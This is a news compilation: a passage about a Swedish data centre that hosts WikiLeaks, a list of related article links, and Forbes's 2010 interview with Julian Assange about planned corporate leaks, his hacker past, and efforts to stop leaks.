But the threat to data is not from physical theft – not from robbers with guns – though they would have a hard job – but from cyber attack. Mr Karlung said they monitored the traffic into and out of the centre. But he said he would be naive to think that people would not try so they had given Wikileaks a separate channel in – its own pipe for data as it were. Does he fear the wrath of the United States because his facility stores such embarrassing information? “Our role must be to keep this service up. We are in Sweden and this service is legal in Sweden and therefore we must stand up for our client,” he said. “We must do everything in our power to keep the service up. I believe in the freedom of speech”. He said his data centre was like the postal service. You do not blame the postman for the content of the letter – nor do you open the letter if you are a postal delivery person. So it is with servers, he thinks: “We should be able to help Wikileaks operate their servers as long as they are not violating any laws. “That principle is the most important thing to stand for”.

“At the moment, for example, we are sitting on 5GB from Bank of America, one of the executive’s hard drives…”

U.S. BANKERS NEXT?
http://www.computerworld.com/s/article/9139180/Wikileaks_plans_to_make_the_Web_a_leakier_place
http://news.cnet.com/8301-27080_3-10450552-245.html
http://news.cnet.com/8301-31921_3-20011106-281.html
http://www.wired.com/threatlevel/2010/09/wikileaks-revolt/
http://www.digitaltrends.com/computing/wikileaks-defectors-form-openleaks-org/
http://www.guardian.co.uk/world/blog/2010/dec/03/julian-assange-wikileaks
http://blogs.forbes.com/andygreenberg/2010/11/29/an-interview-with-wikileaks-julian-assange/
An Interview With WikiLeaks’ Julian Assange
by Andy Greenberg / Nov. 29 2010

Admire him or revile him, WikiLeaks’ Julian Assange is the prophet of a coming age of involuntary transparency, the leader of an organization devoted to divulging the world’s secrets using technology unimagined a generation ago. Over the last year his information insurgency has dumped 76,000 secret Afghan war documents and another trove of 392,000 files from the Iraq war into the public domain–the largest classified military security breaches in history. Sunday, WikiLeaks made the first of 250,000 classified U.S. State Department cables public, offering an unprecedented view of how America’s top diplomats view enemies and friends alike. But, as Assange explained to me earlier this month, the Pentagon and State Department leaks are just the start.

Forbes: To start, is it true you’re sitting on trove of unpublished documents?
Julian Assange: Sure. That’s usually the case. As we’ve gotten more successful, there’s a gap between the speed of our publishing pipeline and the speed of our receiving submissions pipeline. Our pipeline of leaks has been increasing exponentially as our profile rises, and our ability to publish is increasing linearly.

Q. You mean as your personal profile rises?
A. Yeah, the rising profile of the organization and my rising profile also. And there’s a network effect for anything to do with trust. Once something starts going around and being considered trustworthy in a particular arena, and you meet someone and they say “I heard this is trustworthy,” then all of a sudden it reconfirms your suspicion that the thing is trustworthy. So that’s why brand is so important, just as it is with anything you have to trust.

Q. And this gap between your publishing resources and your submissions is why the site’s submission function has been down since October?
A. We have too much.

Q. Before you turned off submissions, how many leaks were you getting a day?
A. As I said, it was increasing exponentially. When we get lots of press, we can get a spike of hundreds or thousands. The quality is sometimes not as high. If the front page of the Pirate Bay links to us, as they have done on occasion, we can get a lot of submissions, but the quality is not as high.

Q. How much of this trove of documents that you’re sitting on is related to the private sector?
A. About fifty percent.

Q. You’ve been focused on the U.S. military mostly in the last year. Does that mean you have private sector-focused leaks in the works?
A. Yes. If you think about it, we have a publishing pipeline that’s increasing linearly, and an exponential number of leaks, so we’re in a position where we have to prioritize our resources so that the biggest impact stuff gets released first.

Q. So do you have very high impact corporate stuff to release then?
A. Yes, but maybe not as high impact… I mean, it could take down a bank or two.

Q. That sounds like high impact.
A. But not as big an impact as the history of a whole war. But it depends on how you measure these things.

Q. When will WikiLeaks return to its older model of more frequent leaks of smaller amounts of material?
A. If you look at the average number of documents we’re releasing, we’re vastly exceeding what we did last year. These are huge datasets. So it’s actually very efficient for us to do that. If you look at the number of packages, the number of packages has decreased. But if you look at the average number of documents, that’s tremendously increased.

Q. So will you return to the model of higher number of targets and sources?
A. Yes. Though I do actually think… [pauses] These big package releases. There should be a cute name for them.

Q. Megaleaks?
A. Megaleaks. That’s good. These megaleaks… They’re an important phenomenon, and they’re only going to increase. When there’s a tremendous dataset, covering a whole period of history or affecting a whole group of people, that’s worth specializing on and doing a unique production for each one, which is what we’ve done. We’re totally source dependent. We get what we get. As our profile rises in a certain area, we get more in a particular area. People say, why don’t you release more leaks from the Taliban. So I say hey, help us, tell more Taliban dissidents about us.

Q. These megaleaks, as you call them, we haven’t seen any of those from the private sector.
A. No, not at the same scale as for the military.

Q. Will we?
A. Yes. We have one related to a bank coming up, that’s a megaleak. It’s not as big a scale as the Iraq material, but it’s either tens or hundreds of thousands of documents depending on how you define it.

Q. Is it a U.S. bank?
A. Yes, it’s a U.S. bank.

Q. One that still exists?
A. Yes, a big U.S. bank.

Q. The biggest U.S. bank?
A. No comment.

Q. When will it happen?
A. Early next year. I won’t say more.

Q. What do you want to be the result of this release?
A. [Pauses] I’m not sure. It will give a true and representative insight into how banks behave at the executive level in a way that will stimulate investigations and reforms, I presume. Usually when you get leaks at this level, it’s about one particular case or one particular violation. For this, there’s only one similar example. It’s like the Enron emails. Why were these so valuable? When Enron collapsed, through court processes, thousands and thousands of emails came out that were internal, and it provided a window into how the whole company was managed. It was all the little decisions that supported the flagrant violations. This will be like that. Yes, there will be some flagrant violations, unethical practices that will be revealed, but it will also be all the supporting decision-making structures and the internal executive ethos that cames out, and that’s tremendously valuable. Like the Iraq War Logs, yes there were mass casualty incidents that were very newsworthy, but the great value is seeing the full spectrum of the war. You could call it the ecosystem of corruption. But it’s also all the regular decision making that turns a blind eye to and supports unethical practices: the oversight that’s not done, the priorities of executives, how they think they’re fulfilling their own self-interest. The way they talk about it.

Q. How many dollars were at stake in this?
A. We’re still investigating. All I can say is it’s clear there were unethical practices, but it’s too early to suggest there’s criminality. We have to be careful about applying criminal labels to people until we’re very sure.

Q. Can you tell me anything about what kind of unethical behavior we’re talking about?
A. No.

Q. You once said to one of my colleagues that WikiLeaks has material on BP. What have you got?
A. We’ve got lots now, but we haven’t determined how much is original. There’s been a lot of press on the BP issue, and lawyers, and people are pulling out a lot of stuff. So I suspect the material we have on BP may not be that original. We’ll have to see whether our stuff is especially unique.

Q. The Russian press has reported that you plan to target Russian companies and politicians. I’ve heard from other WikiLeaks sources that this was blown out of proportion.
A. It was blown out of proportion when the FSB reportedly said not to worry, that they could take us down. But yes, we have material on many business and governments, including in Russia. It’s not right to say there’s going to be a particular focus on Russia.

Q. Let’s just walk through other industries. What about pharmaceutical companies?
A. Yes. To be clear, we have so much unprocessed stuff, I’m not even sure about all of it. These are just things I’ve briefly looked at or that one of our people have told me about.

Q. How much stuff do you have? How many gigs or terabytes?
A. I’m not sure. I haven’t had time to calculate.

Q. Continuing then: The tech industry?
A. We have some material on spying by a major government on the tech industry. Industrial espionage.

Q. U.S.? China?
A. The U.S. is one of the victims.

Q. What about the energy industry?
A. Yes.

Q. Aside from BP?
A. Yes.

Q. On environmental issues?
A. A whole range of issues.

Q. Can you give me some examples?
A. One example: It began with something we released last year, quite an interesting case that wasn’t really picked up by anyone. There’s a Texas Canadian oil company whose name escapes me. And they had these wells in Albania that had been blowing. Quite serious. We got this report from a consultant engineer into what was happening, saying vans were turning up in the middle of the night doing something to them. They were being sabotaged. The Albanian government was involved with another company; There were two rival producers and one was government-owned and the other was privately owned. So when we got this report; It didn’t have a header. It didn’t say the name of the firm, or even who the wells belonged to.

Q. So it wasn’t picked up because it was missing key data.
A. At the time, yeah. So I said, what the hell do we do with this thing? It’s impossible to verify if we don’t even know who it came from. It could have been one company trying to frame the other one. So we did something very unusual, and published it and said “We’ve got this thing, looks like it could have been written by a rival company aiming to defame the other, but we can’t verify it. We want more information.” Whether it’s a fake document or real one, something was going on. Either one company is trying to frame the other, which is interesting, or it’s true, which is also very interesting. That’s where the matter sat until we got a letter of inquiry from an engineering consulting company asking how to get rid of it. We demanded that they first prove that they were the owner.

Q. It sounds like when Apple confirmed that the lost iPhone 4 was real, by demanding that Gizmodo return it.
A. Yes, like Apple and the iPhone. They sent us a screen capture with the missing header and other information.

Q. What were they thinking?
A. I don’t know.

Q. So the full publication is coming up?
A. Yes.

Q. Do you have more on finance?
A. We have a lot of finance related things. Of the commercial sectors we’ve covered, finance is the most significant. Before the banks went bust in Dubai, we put out a number of leaks showing they were unhealthy. They threatened to send us to prison in Dubai, which is a little serious, if we went there.

Q. Just to review, what would you say are the biggest five private sector leaks in WikiLeaks’ history?
A. It depends on the importance of the material vs. the impact. Kaupthing was one of the most important, because of the chain of effects it set off, the scrutiny in Iceland and the rest of Scandinvia. The Bank Julius Baer case was also important. The Kaupthing leak was a very good leak. The loanbook described in very frank terms the credit worthiness of all these big companies and billionaires and borrowers, not just internal to the bank, but a broad spectrum all over the world, an assessment of a whole bunch of businesses around the world. It was quite an interesting leak. It didn’t just expose Kaupthing, it exposed many companies. The bank Julius Baer exposed high net worth individuals hiding assets in the Cayman Islands, and we went on to do a series that exposed bank Julius Baer’s own internal tax structure. It’s interesting that Swiss banks also hide their assets from the Swiss by using offshore bank structuring. We had some quite good stuff in there. It set off a chain of regulatory investigations, possibly resulting in some changes. It triggered a lot of interesting scrutiny.

Q. Regulation: Is that what you’re after?
A. I’m not a big fan of regulation: anyone who likes freedom of the press can’t be. But there are some abuses that should be regulated, and this is one. With regard to these corporate leaks, I should say: There’s an overlap between corporate and government leaks. When we released the Kroll report on three to four billion smuggled out by the former Kenyan president Daniel arap Moi and his cronies, where did the money go? There’s no megacorruption–as they call it in Africa, it’s a bit sensational but you’re talking about billions–without support from Western banks and companies. That money went into London properties, Swiss banks, property in New York, companies that had been set up to move this money. We had another interesting one from the pharmaceutical industry: It was quite self-referential. The lobbyists had been getting leaks from the WHO. They were getting their own internal intelligence report affecting investment regulation. We were leaked a copy. It was a meta-leak. That was quite influential, though it was a relatively small leak–it was published in Nature and other pharma journals.

Q. What do you think WikiLeaks mean for business? How do businesses need to adjust to a world where WikiLeaks exists?
A. WikiLeaks means it’s easier to run a good business and harder to run a bad business, and all CEOs should be encouraged by this. I think about the case in China where milk powder companies started cutting the protein in milk powder with plastics. That happened at a number of separate manufacturers. Let’s say you want to run a good company. It’s nice to have an ethical workplace. Your employees are much less likely to screw you over if they’re not screwing other people over. Then one company starts cutting their milk powder with melamine, and becomes more profitable. You can follow suit, or slowly go bankrupt and the one that’s cutting its milk powder will take you over. That’s the worst of all possible outcomes. The other possibility is that the first one to cut its milk powder is exposed. Then you don’t have to cut your milk powder. There’s a threat of regulation that produces self-regulation. It just means that it’s easier for honest CEOs to run an honest business, if the dishonest businesses are more effected negatively by leaks than honest businesses. That’s the whole idea. In the struggle between open and honest companies and dishonest and closed companies, we’re creating a tremendous reputational tax on the unethical companies. No one wants to have their own things leaked. It pains us when we have internal leaks. But across any given industry, it is both good for the whole industry to have those leaks and it’s especially good for the good players.

Q. But aside from the market as a whole, how should companies change their behavior understanding that leaks will increase?
A. Do things to encourage leaks from dishonest competitors. Be as open and honest as possible. Treat your employees well. I think it’s extremely positive. You end up with a situation where honest companies producing quality products are more competitive than dishonest companies producing bad products. And companies that treat their employees well do better than those that treat them badly.

Q. Would you call yourself a free market proponent?
A. Absolutely. I have mixed attitudes towards capitalism, but I love markets. Having lived and worked in many countries, I can see the tremendous vibrancy in, say, the Malaysian telecom sector compared to U.S. sector. In the U.S. everything is vertically integrated and sewn up, so you don’t have a free market. In Malaysia, you have a broad spectrum of players, and you can see the benefits for all as a result.

Q. How do your leaks fit into that?
A. To put it simply, in order for there to be a market, there has to be information. A perfect market requires perfect information. There’s the famous lemon example in the used car market. It’s hard for buyers to tell lemons from good cars, and sellers can’t get a good price, even when they have a good car. By making it easier to see where the problems are inside of companies, we identify the lemons. That means there’s a better market for good companies. For a market to be free, people have to know who they’re dealing with.

Q. You’ve developed a reputation as anti-establishment and anti-institution.
A. Not at all. Creating a well-run establishment is a difficult thing to do, and I’ve been in countries where institutions are in a state of collapse, so I understand the difficulty of running a company. Institutions don’t come from nowhere. It’s not correct to put me in any one philosophical or economic camp, because I’ve learned from many. But one is American libertarianism, market libertarianism. So as far as markets are concerned I’m a libertarian, but I have enough expertise in politics and history to understand that a free market ends up as monopoly unless you force them to be free. WikiLeaks is designed to make capitalism more free and ethical.

Q. But in the meantime, there could be a lot of pain from these scandals, obviously.
A. Pain for the guilty.

Q. Do you derive pleasure from these scandals that you expose and the companies you shame?
A. It’s tremendously satisfying work to see reforms being engaged in and stimulating those reforms. To see opportunists and abusers brought to account.

Q. You were a traditional computer hacker. How did you find this new model of getting information out of companies?
A. It’s a bit annoying, actually. Because I cowrote a book about [being a hacker], there are documentaries about that, people talk about that a lot. They can cut and paste. But that was 20 years ago. It’s very annoying to see modern day articles calling me a computer hacker. I’m not ashamed of it, I’m quite proud of it. But I understand the reason they suggest I’m a computer hacker now. There’s a very specific reason. I started one of the first ISPs in Australia, known as Suburbia, in 1993. Since that time, I’ve been a publisher, and at various moments a journalist. There’s a deliberate attempt to redefine what we’re doing not as publishing, which is protected in many countries, or the journalist activities, which is protected in other ways, as something which doesn’t have a protection, like computer hacking, and to therefore split us off from the rest of the press and from these legal protections. It’s done quite deliberately by some of our opponents. It’s also done because of fear, from publishers like The New York Times that they’ll be regulated and investigated if they include our activities in publishing and journalism.

Q. I’m not arguing you’re a hacker now. But if we say that both what you were doing then and now are both about gaining access to information, when did you change your strategy from going in and getting it to simply asking for it?
A. That hacker mindset was very valuable to me. But the insiders know where the bodies are. It’s much more efficient to have insiders. They know the problems, they understand how to expose them.

Q. How did you start to approach your leak strategy?
A. When we started Suburbia in 1993, I knew that bringing information to the people was very important. We facilitated many groups: We were the electronic printer if you like for many companies and individuals who were using us to publish information. They were bringing us information, and some of them were activist groups, lawyers. And some bringing forth information about companies, like Telstra, the Australian telecommunications giant. We published information on them. That’s something I was doing in the 1990s. We were the free speech ISP in Australia. An Australian Anti-church of Scientology website was hounded out of Victoria University by legal threats from California, and hounded out of a lot of places. Eventually they came to us. People were fleeing from ISPs that would fold under legal threats, even from a cult in the U.S. That’s something I saw early on, without realizing it: potentiating people to reveal their information, creating a conduit. Without having any other robust publisher in the market, people came to us.

Q. I wanted to ask you about [Peiter Zatko, a legendary hacker and security researcher who also goes by] “Mudge.”
A. Yeah, I know Mudge. He’s a very sharp guy.

Q. Mudge is now leading a project at the Pentagon’s Defense Advanced Research Projects Agency to find a technology that can stop leaks, which seems pretty relative to your organization. Can you tell me about your past relationship with Mudge?
A. Well, I…no comment.

Q. Were you part of the same scene of hackers? When you were a computer hacker, you must have known him well.
A. We were in the same milieu. I spoke with everyone in that milieu.

Q. What do you think of his current work to prevent digital leaks inside of organizations, a project called Cyber Insider Threat or Cinder?
A. I know nothing about it.

Q. But what do you of the potential of any technology designed to prevent leaks?
A. Marginal.

Q. What do you mean?
A. New formats and new ways of communicating are constantly cropping up. Stopping leaks is a new form of censorship. And in the same manner that very significant resources spent on China’s firewall, the result is that anyone who’s motivated can work around it. Not just the small fraction of users, but anyone who really wants to can work around it. Censorship circumvention tools [like the program Tor] also focus on leaks. They facilitate leaking. Airgapped networks are different. Where there’s literally no connection between the network and the internet. You may need a human being to carry something. But they don’t have to intentionally carry it. It could be a virus on a USB stick, as the Stuxnet worm showed, though it went in the other direction. You could pass the information out via someone who doesn’t know they’re a mule.

Q. Back to Mudge and Cinder: Do you think, knowing his intelligence personally, that he can solve the problem of leaks?
A. No, but that doesn’t mean that the difficulty can’t be increased. But I think it’s a very difficult case, and the reason I suggest it’s an impossible case to solve completely is that most people do not leak. And the various threats and penalties already mean they have to be highly motivated to deal with those threats and penalties. These are highly motivated people. Censoring might work for the average person, but not for highly motivated people. And our people are highly motivated. Mudge is a clever guy, and he’s also highly ethical. I suspect he would have concerns about creating a system to conceal genuine abuses.

Q. But his goal of preventing leaks doesn’t differentiate among different types of content. It would stop whistleblowers just as much as it stops exfiltration of data by foreign hackers.
A. I’m sure he’ll tell you China spies on the U.S., Russia, France. There are genuine concerns about those powers exfiltrating data. And it’s possibly ethical to combat that process. But spying is also stabilizing to relationships. Your fears about where a country is or is not are always worse than the reality. If you only have a black box, you can put all your fears into it, particularly opportunists in government or private industry who want to address a problem that may not exist. If you know what a government is doing, that can reduce tensions.

Q. There have been reports that Daniel Domscheit-Berg, a German who used to work with WikiLeaks, has left to create his own WikiLeaks-type organization. The Wall Street Journal described him as a “competitor” to WikiLeaks. Do you see him as competition?
A. The supply of leaks is very large. It’s helpful for us to have more people in this industry. It’s protective to us.

Q. What do you think of the idea of WikiLeaks copycats and spinoffs?
A. There have been a few over time, and they’ve been very dangerous. It’s not something that’s easy to do right. That’s the problem. Recently we saw a Chinese WikiLeaks. We encouraged them to come to us to work with us. It would be nice to have more Chinese speakers working with us in a dedicated way. But what they’d set up had no meaningful security. They have no reputation you can trust. It’s very easy and very dangerous to do it wrong.

Q. Do you think that the Icelandic Modern Media Initiative [a series of bills to make Iceland the most free-speech and whistleblower-protective country in the world] would make it easier to do this right if it passes?
A. Not at the highest level. We deal with organizations that do not obey the rule of law. So laws don’t matter. Intelligence agencies keep things secret because they often violate the rule of law or of good behavior.

Q. What about corporate leaks?
A. For corporate leaks, yes, free speech laws could make things easier. Not for military contractors, because they’re in bed with intelligence agencies. If a spy agency’s involved, IMMI won’t help you. Except it may increase the diplomatic cost a little, if they’re caught. That’s why our primary defense isn’t law, but technology.

Q. Are there any other leaking organizations that you do endorse?
A. No, there are none.

Q. Do you hope that IMMI will foster a new generation of WikiLeaks-type organizations?
A. More than WikiLeaks: general publishing. We’re the canary in the coalmine. We’re at the vanguard. But the attacks against publishers in general are severe.

Q. If you had a wishlist of what industries or governments, what are you looking for from leakers?
A. All governments, all industries. We accept all material of diplomatic, historical or ethical significance that hasn’t been released before and is under active suppression. There’s a question about which industries have the greatest potential for reform. Those may be the ones we haven’t heard about yet. So what’s the big thing around the corner? The real answer is I don’t know. No one in the public knows. But someone on the inside does know.

Q. But there are also industries that just have more secrecy, so you must know there are things you want that you haven’t gotten.
A. That’s right. Within the intelligence industry is one example. They have a higher level of secrecy. And that’s also true of the banking industry. Other industries that are extremely well paid, say Goldman Sachs, might have higher incentives not to lose their jobs. So it’s only the obvious things that we want: Things concerning intelligence and war, and mass financial fraud. Because they affect so many people so severely.

Q. And they’re harder leaks to get.
A. Intelligence particularly, because the penalties are so severe. Although very few people have been caught, it’s worth noting. The penalties may be severe, but nearly everyone gets away with it. To keep people in control, you only need to make them scared. The CIA is not scared as an institution of people leaking. It’s scared that people will know that people are leaking and getting away with it. If that happens, the management loses control.

Q. And WikiLeaks has the opposite strategy?
A. That’s right. It’s summed up by the phrase “courage is contagious.” If you demonstrate that individuals can leak something and go on to live a good life, it’s tremendously incentivizing to people.